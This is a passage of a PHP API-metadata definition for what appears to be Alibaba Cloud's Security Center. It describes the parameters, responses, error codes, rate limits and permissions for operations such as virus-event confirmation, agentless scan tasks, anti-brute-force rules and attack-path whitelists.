], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"Result\\": true,\\n \\"RequestId\\": \\"5DFD6277-CC36-57F7-ACE6-F5952XXXXXXXX\\"\\n}","type":"json"}]', 'title' => 'ConfirmVirusEvents', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'ConfirmVirusEvents'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'update', 'ramAction' => [ 'action' => 'yundun-sas:ConfirmVirusEvents', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], ], 'CopyCustomizeReportConfig' => [ 'summary' => 'Clones an existing security report. The new security report has the same configuration as the existing security report.', 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'readAndWrite', 'systemTags' => ['operationType' => 'get'], 'parameters' => [ [ 'name' => 'SourceIp', 'in' => 'query', 'schema' => ['description' => 'The source IP address of the request.'."\n", 'type' => 'string', 'required' => false, 'example' => '59.46.XXX.XXX', 'title' => ''], ], [ 'name' => 'Lang', 'in' => 'query', 'schema' => ['description' => 'The language of the content within the request and response. Default value: **zh**. Valid values:'."\n" ."\n" .'* **zh**: Chinese'."\n" .'* **en**: English'."\n", 'type' => 'string', 'required' => false, 'example' => 'zh', 'title' => ''], ], [ 'name' => 'ReportId', 'in' => 'query', 'schema' => ['description' => 'The ID of the report.'."\n" ."\n" .'> You can call the [DescribeCustomizeReportList](~~DescribeCustomizeReportList~~) operation to query the ID.', 'type' => 'integer', 'format' => 'int64', 'required' => true, 'example' => '492742', 'title' => ''], ], ], 'responses' => [ 200 => [ 'headers' => [], 'schema' => [ 'type' => 'object', 'properties' => [ 'RequestId' => ['description' => 'The request ID.'."\n", 'type' => 'string', 'example' => '1EE7B150-D67E-53FD-A52D-3E8E669A****', 'title' => ''], ], 'description' => '', 'title' => '', 'example' => '', ], ], ], 'errorCodes' => [ 400 => [ ['errorCode' => '-101', 'errorMessage' => '%s %s', 'description' => ''], ], 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => 'You are not authorized to do this operation.'], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"RequestId\\": \\"1EE7B150-D67E-53FD-A52D-3E8E669A****\\"\\n}","type":"json"}]', 'title' => 'CopyCustomizeReportConfig', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'CopyCustomizeReportConfig'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'get', 'ramAction' => [ 'action' => 'yundun-aegis:CopyCustomizeReportConfig', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], ], 'CreateAgentlessScanTask' => [ 'summary' => 'Creates an agentless detection task.', 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'readAndWrite', 'systemTags' => [ 'operationType' => 'create', 'abilityTreeCode' => '155384', 'abilityTreeNodes' => ['FEATUREsasON13NY'], ], 'parameters' => [ [ 'name' => 'TargetType', 'in' => 'query', 'schema' => ['description' => 'The type of the detection object. Valid values:'."\n" ."\n" .'* **2**: image'."\n", 'type' => 'integer', 'format' => 'int32', 'required' => true, 'example' => '2', 'title' => ''], ], [ 'name' => 'UuidList', 'in' => 'query', 'style' => 'repeatList', 'schema' => [ 'description' => 'The UUIDs of the assets on which you want to run the detection task.'."\n" ."\n" .'> You can call the [DescribeCloudCenterInstances](~~DescribeCloudCenterInstances~~) operation to query the UUIDs of servers.'."\n", 'type' => 'array', 'items' => ['description' => 'The UUID of the asset on which you want to run the detection task.'."\n", 'type' => 'string', 'required' => false, 'example' => '66a9c708-d4a4-4feb-aa00-61006556****', 'title' => ''], 'required' => false, 'maxItems' => 1000, 'title' => '', 'example' => '', ], ], [ 'name' => 'AutoDeleteDays', 'in' => 'query', 'schema' => ['description' => 'The retention period of images. Unit: days.'."\n", 'type' => 'integer', 'format' => 'int32', 'required' => false, 'example' => '1', 'title' => ''], ], [ 'name' => 'ScanDataDisk', 'in' => 'query', 'schema' => ['description' => 'Specifies whether to check data disks. Valid values:'."\n" ."\n" .'* **true**'."\n" .'* **false**'."\n", 'type' => 'boolean', 'required' => false, 'example' => 'true', 'title' => ''], ], [ 'name' => 'ReleaseAfterScan', 'in' => 'query', 'schema' => ['description' => 'Specifies whether to enable the cost-saving mode. Valid values:'."\n" ."\n" .'* **true**'."\n" .'* **false**'."\n", 'type' => 'boolean', 'required' => false, 'example' => 'true', 'title' => ''], ], [ 'name' => 'AssetSelectionType', 'in' => 'query', 'schema' => ['description' => 'Identification of asset selection.', 'type' => 'string', 'required' => false, 'example' => 'AGENTLESS_SCAN_ONCE_TASK_1720145******', 'title' => ''], ], ], 'responses' => [ 200 => [ 'schema' => [ 'type' => 'object', 'properties' => [ 'RequestId' => ['description' => 'The request ID.'."\n", 'type' => 'string', 'example' => 'E90DE229-9FC6-58F6-BF4B-03AD6179****', 'title' => ''], ], 'description' => '', 'title' => '', 'example' => '', ], ], ], 'errorCodes' => [ 400 => [ ['errorCode' => 'TaskIsProcessing', 'errorMessage' => 'Task Is Processing.', 'description' => 'Task is processing.'], ], 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => 'You are not authorized to do this operation.'], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"RequestId\\": \\"E90DE229-9FC6-58F6-BF4B-03AD6179****\\"\\n}","type":"json"}]', 'title' => 'CreateAgentlessScanTask', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'CreateAgentlessScanTask'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'create', 'ramAction' => [ 'action' => 'yundun-sas:CreateAgentlessScanTask', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], ], 'CreateAntiBruteForceRule' => [ 'summary' => 'Creates a defense rule against brute-force attacks.', 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'readAndWrite', 'deprecated' => false, 'systemTags' => [ 'operationType' => 'create', 'riskType' => 'none', 'chargeType' => 'free', 'abilityTreeNodes' => ['FEATUREsas2XWKXT'], ], 'parameters' => [ [ 'name' => 'SourceIp', 'in' => 'query', 'schema' => ['description' => 'The source IP address of the request.'."\n", 'type' => 'string', 'required' => false, 'example' => '192.168.XX.XX', 'title' => ''], ], [ 'name' => 'Name', 'in' => 'query', 'schema' => ['description' => 'The name of the defense rule.'."\n", 'type' => 'string', 'required' => true, 'example' => 'TestAntiBruteForceRule', 'title' => ''], ], [ 'name' => 'Span', 'in' => 'query', 'schema' => ['description' => 'The maximum period of time during which failed logon attempts from an account can occur. Unit: minutes. Valid values:'."\n" ."\n" .'* **1**'."\n" .'* **2**'."\n" .'* **5**'."\n" .'* **10**'."\n" .'* **15**'."\n" ."\n" .'> To configure a defense rule, you must specify the Span, FailCount, and ForbiddenTime parameters. If the number of failed logon attempts from an account within the minutes specified by Span exceeds the value specified by FailCount, the account cannot be used for logons within the minutes specified by ForbiddenTime.'."\n", 'type' => 'integer', 'format' => 'int32', 'required' => true, 'example' => '1', 'title' => ''], ], [ 'name' => 'FailCount', 'in' => 'query', 'schema' => ['description' => 'The maximum number of failed logon attempts from an account. Valid values: 2, 3, 4, 5, 10, 50, 80, and 100.'."\n", 'type' => 'integer', 'format' => 'int32', 'required' => true, 'example' => '2', 'title' => ''], ], [ 'name' => 'ForbiddenTime', 'in' => 'query', 'schema' => ['description' => 'The period of time during which logons from an account are not allowed. Unit: minutes. Valid values:'."\n" ."\n" .'* **5**'."\n" .'* **15**'."\n" .'* **30**'."\n" .'* **60**'."\n" .'* **120**'."\n" .'* **360**'."\n" .'* **720**'."\n" .'* **1440**'."\n" .'* **10080**'."\n" .'* **52560000**: permanent'."\n", 'type' => 'integer', 'format' => 'int32', 'required' => true, 'example' => '5', 'title' => ''], ], [ 'name' => 'DefaultRule', 'in' => 'query', 'schema' => ['description' => 'Specifies whether to set the defense rule as the default rule. Valid values:'."\n" ."\n" .'* **true**: yes'."\n" .'* **false**: no'."\n", 'type' => 'boolean', 'required' => false, 'example' => 'true', 'title' => ''], ], [ 'name' => 'UuidList', 'in' => 'query', 'style' => 'repeatList', 'schema' => [ 'description' => 'The UUIDs of the servers to which you want to apply the defense rule.'."\n", 'type' => 'array', 'items' => ['description' => 'The UUID of the server to which you want to apply the defense rule.'."\n", 'type' => 'string', 'required' => false, 'example' => '292dcc68-b60b-4bbd-a0be-beaa1622****', 'title' => ''], 'required' => true, 'maxItems' => 10000, 'title' => '', 'example' => '', ], ], [ 'name' => 'ProtocolType', 'in' => 'query', 'style' => 'json', 'schema' => [ 'description' => 'The types of protocols supported for interception by the brute force attack rule creation.', 'type' => 'object', 'properties' => [ 'Rdp' => ['description' => 'Whether to enable RDP interception, default is on. Values: '."\n" .'- **on**: Enable '."\n" .'- **off**: Disable', 'type' => 'string', 'required' => false, 'example' => 'on', 'title' => ''], 'Ssh' => ['description' => 'Whether to enable SSH interception, default is on. Values: '."\n" .'- **on**: Enable '."\n" .'- **off**: Disable', 'type' => 'string', 'required' => false, 'example' => 'on', 'title' => ''], 'SqlServer' => ['description' => 'Whether to enable the SqlServer interception method, default is off. Values: '."\n" .'- **on**: Enable '."\n" .'- **off**: Disable', 'type' => 'string', 'required' => false, 'example' => 'off', 'title' => ''], ], 'required' => false, 'title' => '', 'example' => '', ], ], ], 'responses' => [ 200 => [ 'headers' => [], 'schema' => [ 'type' => 'object', 'properties' => [ 'RequestId' => ['description' => 'The ID of the request, which is used to locate and troubleshoot issues.'."\n", 'type' => 'string', 'example' => 'F35F45B0-5D6B-4238-BE02-A62D0760E840', 'title' => ''], 'CreateAntiBruteForceRule' => [ 'description' => 'The information about the defense rule.'."\n", 'type' => 'object', 'properties' => [ 'RuleId' => ['description' => 'The ID of the defense rule.'."\n", 'type' => 'integer', 'format' => 'int64', 'example' => '65778', 'title' => ''], ], 'title' => '', 'example' => '', ], ], 'description' => '', 'title' => '', 'example' => '', ], ], ], 'errorCodes' => [ 400 => [ ['errorCode' => 'NotBuy', 'errorMessage' => 'user not buy service', 'description' => 'User not buy service.'], ], 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => 'You are not authorized to do this operation.'], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'responseDemo' => '[{"type":"json","example":"{\\n \\"RequestId\\": \\"F35F45B0-5D6B-4238-BE02-A62D0760E840\\",\\n \\"CreateAntiBruteForceRule\\": {\\n \\"RuleId\\": 65778\\n }\\n}","errorExample":""},{"type":"xml","example":"\\n F35F45B0-5D6B-4238-BE02-A62D0760E840\\n \\n 65778\\n \\n","errorExample":""}]', 'title' => 'CreateAntiBruteForceRule', 'requestParamsDescription' => ' ', 'responseParamsDescription' => ' ', 'extraInfo' => ' ', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'CreateAntiBruteForceRule'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'create', 'ramAction' => [ 'action' => 'yundun-sas:CreateAntiBruteForceRule', 'authLevel' => 'resource', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'AntiBruteForceRule', 'arn' => 'acs:yundun-sas:{#regionId}:{#accountId}:antibruteforcerule/*'], ], ], ], ], ], 'CreateAssetSelectionConfig' => [ 'summary' => 'Create asset selection configurations.', 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'readAndWrite', 'systemTags' => [ 'operationType' => 'create', 'riskType' => 'none', 'chargeType' => 'free', 'abilityTreeCode' => '168193', 'abilityTreeNodes' => ['FEATUREsasK0Q1Y8'], 'tenantRelevance' => 'publicInformation', ], 'parameters' => [ [ 'name' => 'BusinessType', 'in' => 'query', 'allowEmptyValue' => false, 'schema' => ['description' => 'The feature that you want to select for the asset. Valid values:'."\n" ."\n" .'* **VIRUS_SCAN_CYCLE_CONFIG**: virus detection and removal'."\n" .'* **VIRUS_SCAN_ONCE_TASK**: one-time scan for viruses'."\n" .'* **AGENTLESS_MALICIOUS_WHITE_LIST_\\[ID]**: a whitelist rule for alerts that are detected by using the agentless detection feature'."\n" .'* **AGENTLESS_VUL_WHITE_LIST_\\[ID]**: a whitelist rule for vulnerabilities that are detected by using the agentless detection feature'."\n" .'* **FILE_PROTECT_RULE_SWITCH_TYPE_\\[ID]**: core file protection'."\n", 'type' => 'string', 'required' => true, 'example' => 'VIRUS_SCAN_CYCLE_CONFIG', 'title' => ''], ], [ 'name' => 'TargetType', 'in' => 'query', 'allowEmptyValue' => false, 'schema' => ['description' => 'The dimension based on which you want to select the asset. Valid values:'."\n" ."\n" .'* **instance**: selects the asset by server.'."\n" .'* **group**: selects the asset by group.'."\n" .'* **vpc**: selects the asset by virtual private cloud (VPC).'."\n", 'type' => 'string', 'required' => true, 'example' => 'vpc', 'title' => ''], ], [ 'name' => 'Platform', 'in' => 'query', 'schema' => ['description' => 'The operating system of the asset. Valid values:'."\n" ."\n" .'* **all**: all operating systems'."\n" .'* **windows**: the Windows operating system'."\n" .'* **linux**: the Linux operating system'."\n" ."\n" .'> If you leave this parameter empty, the system automatically selects a value for the parameter based on the value of the **BusinessType** parameter.'."\n" ."\n" .'* If the BusinessType parameter is set to **VIRUS_SCAN_CYCLE_CONFIG**, the value of the Platform parameter is **all**.'."\n" ."\n" .'* If the BusinessType parameter is set to **VIRUS_SCAN_ONCE_TASK**, the value of the Platform parameter is **all**.'."\n" ."\n" .'* If the BusinessType parameter is set to **AGENTLESS_MALICIOUS_WHITE_LIST_\\[ID]**, the value of the Platform parameter is **all**.'."\n" ."\n" .'* If the BusinessType parameter is set to **AGENTLESS_VUL_WHITE_LIST_\\[ID]** the value of the Platform parameter is **all**.'."\n" ."\n" .'* If the BusinessType parameter is set to **FILE_PROTECT_RULE_SWITCH_TYPE_\\[ID]**, the value of the Platform parameter is **linux**.'."\n", 'type' => 'string', 'required' => false, 'example' => 'linux', 'title' => ''], ], ], 'responses' => [ 200 => [ 'schema' => [ 'description' => 'The response parameters.'."\n", 'type' => 'object', 'properties' => [ 'RequestId' => ['description' => 'The request ID.'."\n", 'type' => 'string', 'example' => 'A3D7C47D-3F11-57BB-90E8-E5C20C619F37', 'title' => ''], 'Data' => [ 'description' => 'The returned data.'."\n", 'type' => 'object', 'properties' => [ 'TargetType' => ['description' => 'The dimension based on which the asset is selected. Valid values:'."\n" ."\n" .'* **instance**: The asset is selected by server.'."\n" .'* **group**: The asset is selected by group.'."\n" .'* **vpc**: The asset is selected by VPC.', 'type' => 'string', 'example' => 'group', 'title' => ''], 'SelectionKey' => ['description' => 'The ID of the current asset selection. It can be used to query and modify the asset that is selected.'."\n", 'type' => 'integer', 'format' => 'int64', 'example' => '53e93435-d694-4c03-9ce7-da12bee1****', 'title' => ''], 'BusinessType' => ['description' => 'The business type that is selected for the asset. Valid values:'."\n" ."\n" .'* **VIRUS_SCAN_CYCLE_CONFIG**: virus detection configuration'."\n" .'* **VIRUS_SCAN_ONCE_TASK**: one-time scan for virus detection'."\n", 'type' => 'string', 'example' => 'VIRUS_SCAN_CYCLE_CONFIG', 'title' => ''], 'Platform' => ['description' => 'The operating system of the asset. Valid values:'."\n" ."\n" .'* **windows**: the Windows operating system'."\n" .'* **linux**: the Linux operating system'."\n", 'type' => 'string', 'example' => 'linux', 'title' => ''], ], 'title' => '', 'example' => '', ], ], 'title' => '', 'example' => '', ], ], ], 'errorCodes' => [ 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => 'You are not authorized to do this operation.'], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'staticInfo' => ['returnType' => 'synchronous'], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"RequestId\\": \\"A3D7C47D-3F11-57BB-90E8-E5C20C619F37\\",\\n \\"Data\\": {\\n \\"TargetType\\": \\"group\\",\\n \\"SelectionKey\\": 0,\\n \\"BusinessType\\": \\"VIRUS_SCAN_CYCLE_CONFIG\\",\\n \\"Platform\\": \\"linux\\"\\n }\\n}","type":"json"}]', 'title' => 'CreateAssetSelectionConfig', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'CreateAssetSelectionConfig'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'create', 'ramAction' => [ 'action' => 'yundun-sas:CreateAssetSelectionConfig', 'authLevel' => 'resource', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'AssetSelectionConfig', 'arn' => 'acs:yundun-sas:{#regionId}:{#accountId}:assetselectionconfig/*'], ], ], ], ], ], 'CreateAttackPathSensitiveAssetConfig' => [ 'summary' => 'Create attack path sensitive asset configuration.', 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'write', 'deprecated' => false, 'systemTags' => [ 'operationType' => 'create', 'riskType' => 'none', 'chargeType' => 'free', 'abilityTreeCode' => '226505', 'abilityTreeNodes' => ['FEATUREsasAIJXMJ'], ], 'parameters' => [ [ 'name' => 'AttackPathAssetList', 'in' => 'query', 'style' => 'repeatList', 'schema' => [ 'description' => 'List of cloud product assets.', 'type' => 'array', 'items' => [ 'type' => 'object', 'properties' => [ 'InstanceId' => ['description' => 'Cloud product asset instance ID.'."\n" ."\n" .'> You can call [ListCloudAssetInstances](~~ListCloudAssetInstances~~) to query the cloud product asset instance ID.', 'type' => 'string', 'required' => true, 'example' => 'i-8vb0e8qdaj0yyxjo****', 'title' => ''], 'Vendor' => ['description' => 'Cloud product asset vendor.'."\n" ."\n" .'> You can call [ListCloudAssetInstances](~~ListCloudAssetInstances~~) to query the cloud product asset vendor.', 'type' => 'integer', 'format' => 'int32', 'required' => true, 'example' => '0', 'title' => ''], 'AssetType' => ['description' => 'Type of the cloud product asset.'."\n" ."\n" .'> You can call [ListCloudAssetInstances](~~ListCloudAssetInstances~~) to query the type of the cloud product asset.', 'type' => 'integer', 'format' => 'int32', 'required' => true, 'example' => '17', 'title' => ''], 'AssetSubType' => ['description' => 'Subtype of the cloud product asset.'."\n" ."\n" .'> You can call [ListCloudAssetInstances](~~ListCloudAssetInstances~~) to query the subtype of the cloud product asset.', 'type' => 'integer', 'format' => 'int32', 'required' => true, 'example' => '0', 'title' => ''], 'RegionId' => ['description' => 'Region ID of the cloud product asset instance.'."\n" ."\n" .'> You can call [ListCloudAssetInstances](~~ListCloudAssetInstances~~) to query the region ID of the cloud product asset instance.', 'type' => 'string', 'required' => true, 'example' => 'cn-hangzhou', 'title' => ''], ], 'required' => false, 'description' => '', 'title' => '', 'example' => '', ], 'required' => true, 'maxItems' => 100, 'title' => '', 'example' => '', ], ], [ 'name' => 'ConfigType', 'in' => 'query', 'schema' => ['description' => 'Configuration type. Possible values:'."\n" .'- asset_instance: Asset.', 'type' => 'string', 'required' => true, 'example' => 'asset_instance', 'title' => ''], ], ], 'responses' => [ 200 => [ 'schema' => [ 'type' => 'object', 'properties' => [ 'RequestId' => ['description' => 'The ID of this request, which is a unique identifier generated by Alibaba Cloud for this request and can be used for troubleshooting and problem localization.', 'type' => 'string', 'example' => 'ADE57832-9666-511C-9A80-B87DE2E8****', 'title' => ''], 'AttackPathSensitiveAssetConfig' => [ 'description' => 'Data of the attack path sensitive asset settings.', 'type' => 'object', 'properties' => [ 'AttackPathSensitiveAssetConfigId' => ['description' => 'ID for setting sensitive assets in the attack path.', 'type' => 'string', 'example' => 'apsac-123', 'title' => ''], ], 'title' => '', 'example' => '', ], ], 'description' => '', 'title' => '', 'example' => '', ], ], ], 'errorCodes' => [ 400 => [ ['errorCode' => 'DataExists', 'errorMessage' => 'data exist', 'description' => ''], ], 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => 'You are not authorized to do this operation.'], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'eventInfo' => [ 'enable' => false, 'eventNames' => [], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"RequestId\\": \\"ADE57832-9666-511C-9A80-B87DE2E8****\\",\\n \\"AttackPathSensitiveAssetConfig\\": {\\n \\"AttackPathSensitiveAssetConfigId\\": \\"apsac-123\\"\\n }\\n}","type":"json"}]', 'title' => 'Create Attack Path Sensitive Asset Settings', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'CreateAttackPathSensitiveAssetConfig'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'create', 'ramAction' => [ 'action' => 'yundun-sas:CreateAttackPathSensitiveAssetConfig', 'authLevel' => 'resource', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'AttackPathSensitiveAssetConfig', 'arn' => 'acs:yundun-sas:{#regionId}:{#accountId}:attackpathsensitiveassetconfig/*'], ], ], ], ], 'translator' => 'machine', ], 'CreateAttackPathWhitelist' => [ 'summary' => 'Create Attack Path Whitelist.', 'methods' => ['post', 'get'], 'schemes' => ['https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'write', 'deprecated' => false, 'systemTags' => [ 'operationType' => 'create', 'riskType' => 'none', 'chargeType' => 'free', 'abilityTreeCode' => '226510', 'abilityTreeNodes' => ['FEATUREsasAIJXMJ'], 'tenantRelevance' => 'publicInformation', ], 'parameters' => [ [ 'name' => 'AttackPathAssetList', 'in' => 'query', 'style' => 'repeatList', 'schema' => [ 'description' => 'List of cloud product assets in the attack path.', 'type' => 'array', 'items' => [ 'description' => 'List of cloud product assets in the attack path.', 'type' => 'object', 'properties' => [ 'InstanceId' => ['description' => 'Cloud product asset instance ID.'."\n" ."\n" .'> You can call [ListCloudAssetInstances](~~ListCloudAssetInstances~~) to query the cloud product asset instance ID.', 'type' => 'string', 'required' => false, 'example' => 'i-8vb0e8qdaj0yyxjo****'."\n", 'title' => ''], 'RegionId' => ['description' => 'Region ID of the cloud product asset instance.'."\n" ."\n" .'> You can call [ListCloudAssetInstances](~~ListCloudAssetInstances~~) to query the region ID of the cloud product asset instance.', 'type' => 'string', 'required' => false, 'example' => 'cn-shanghai', 'title' => ''], 'Vendor' => ['description' => 'Vendor of the cloud product asset.'."\n" ."\n" .'> You can call [ListCloudAssetInstances](~~ListCloudAssetInstances~~) to query the vendor of the cloud product asset.', 'type' => 'integer', 'format' => 'int32', 'required' => false, 'example' => '0', 'title' => ''], 'AssetType' => ['description' => 'Type of the cloud product asset.'."\n" ."\n" .'> You can call [ListCloudAssetInstances](~~ListCloudAssetInstances~~) to query the type of the cloud product asset.', 'type' => 'integer', 'format' => 'int32', 'required' => false, 'example' => '0', 'title' => ''], 'AssetSubType' => ['description' => 'Subtype of the cloud product asset.'."\n" ."\n" .'> You can call [ListCloudAssetInstances](~~ListCloudAssetInstances~~) to query the subtype of the cloud product asset.', 'type' => 'integer', 'format' => 'int32', 'required' => false, 'example' => '0', 'title' => ''], 'NodeType' => ['description' => 'Node type, with values:'."\n" .'- **start**: Start point.'."\n" .'- **end**: End point.', 'type' => 'string', 'required' => false, 'example' => 'start', 'title' => ''], ], 'required' => false, 'title' => '', 'example' => '', ], 'required' => false, 'maxItems' => 100, 'title' => '', 'example' => '', ], ], [ 'name' => 'PathType', 'in' => 'query', 'schema' => ['description' => 'Path type.'."\n" .'> You can call [ListAvailableAttackPath](~~ListAvailableAttackPath~~) to query the path type.', 'type' => 'string', 'required' => true, 'example' => 'role_escalation', 'title' => ''], ], [ 'name' => 'PathName', 'in' => 'query', 'schema' => ['description' => 'Path name.'."\n" ."\n" .'> You can call [ListAvailableAttackPath](~~ListAvailableAttackPath~~) to query the path name.', 'type' => 'string', 'required' => false, 'example' => 'ecs_get_credential_by_create_login_profile', 'title' => ''], ], [ 'name' => 'WhitelistType', 'in' => 'query', 'schema' => ['description' => 'Whitelist type. Values:'."\n" ."\n" .'- **ALL_ASSET**: All assets'."\n" .'- **PART_ASSET**: Partial assets', 'type' => 'string', 'required' => true, 'example' => 'ALL_ASSET', 'title' => ''], ], [ 'name' => 'Remark', 'in' => 'query', 'schema' => ['description' => 'Remark information.', 'type' => 'string', 'required' => false, 'example' => 'test', 'title' => ''], ], [ 'name' => 'WhitelistName', 'in' => 'query', 'schema' => ['description' => 'Whitelist name.', 'type' => 'string', 'required' => true, 'example' => 'test', 'title' => ''], ], ], 'responses' => [ 200 => [ 'schema' => [ 'type' => 'object', 'properties' => [ 'RequestId' => ['description' => 'The ID of this request, which is a unique identifier generated by Alibaba Cloud for this request and can be used for troubleshooting and problem localization.', 'type' => 'string', 'example' => '7BC55C8F-226E-5AF5-9A2C-2EC43864****', 'title' => ''], 'AttackPathWhitelist' => [ 'description' => 'Attack path whitelist.', 'type' => 'object', 'properties' => [ 'AttackPathWhitelistId' => ['description' => 'Attack path whitelist ID.', 'type' => 'string', 'example' => 'apwl-b33dec0acf9b42aabde032d656c0****', 'title' => ''], ], 'title' => '', 'example' => '', ], ], 'description' => '', 'title' => '', 'example' => '', ], ], ], 'errorCodes' => [ 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => 'You are not authorized to do this operation.'], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"RequestId\\": \\"7BC55C8F-226E-5AF5-9A2C-2EC43864****\\",\\n \\"AttackPathWhitelist\\": {\\n \\"AttackPathWhitelistId\\": \\"apwl-b33dec0acf9b42aabde032d656c0****\\"\\n }\\n}","type":"json"}]', 'title' => 'CreateAttackPathWhitelist', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'CreateAttackPathWhitelist'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'create', 'ramAction' => [ 'action' => 'yundun-sas:CreateAttackPathWhitelist', 'authLevel' => 'resource', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'AttackPathWhitelist', 'arn' => 'acs:yundun-sas:{#regionId}:{#accountId}:attackpathwhitelist/*'], ], ], ], ], 'translator' => 'machine', ], 'CreateAttestor' => [ 'summary' => 'Creates a witness.', 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'readAndWrite', 'deprecated' => false, 'systemTags' => [ 'operationType' => 'create', 'abilityTreeCode' => '91919', 'abilityTreeNodes' => ['FEATUREsasJEFOWE'], ], 'parameters' => [ [ 'name' => 'SourceIp', 'in' => 'query', 'schema' => ['description' => 'The source IP address.'."\n", 'type' => 'string', 'required' => false, 'example' => '192.168.XX.XX', 'title' => ''], ], [ 'name' => 'Name', 'in' => 'query', 'schema' => ['description' => 'The name of the witness.'."\n", 'type' => 'string', 'required' => false, 'example' => 'attestor-auto-ad5316', 'title' => ''], ], [ 'name' => 'KeyRegionId', 'in' => 'query', 'schema' => ['description' => 'The region ID of the Key Management Service (KMS) key.'."\n", 'type' => 'string', 'required' => false, 'example' => 'cn-hangzhou', 'title' => ''], ], [ 'name' => 'KeyId', 'in' => 'query', 'schema' => ['description' => 'The ID of the KMS key.'."\n", 'type' => 'string', 'required' => false, 'example' => '2e81355b-f8e7-4090-8082-a8f8124a****', 'title' => ''], ], [ 'name' => 'KeyVersionId', 'in' => 'query', 'schema' => ['description' => 'The version ID of the KMS key.'."\n", 'type' => 'string', 'required' => false, 'example' => '8d7c9c91-57ce-4cf4-a959-1e700e13****', 'title' => ''], ], [ 'name' => 'Remark', 'in' => 'query', 'schema' => ['description' => 'The description.'."\n", 'type' => 'string', 'required' => false, 'example' => 'attestor', 'title' => ''], ], ], 'responses' => [ 200 => [ 'headers' => [], 'schema' => [ 'type' => 'object', 'properties' => [ 'RequestId' => ['description' => 'The request ID.'."\n", 'type' => 'string', 'example' => 'B44EA7F0-497A-5F10-B5A8-87291356****', 'title' => ''], ], 'description' => '', 'title' => '', 'example' => '', ], ], ], 'errorCodes' => [ 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 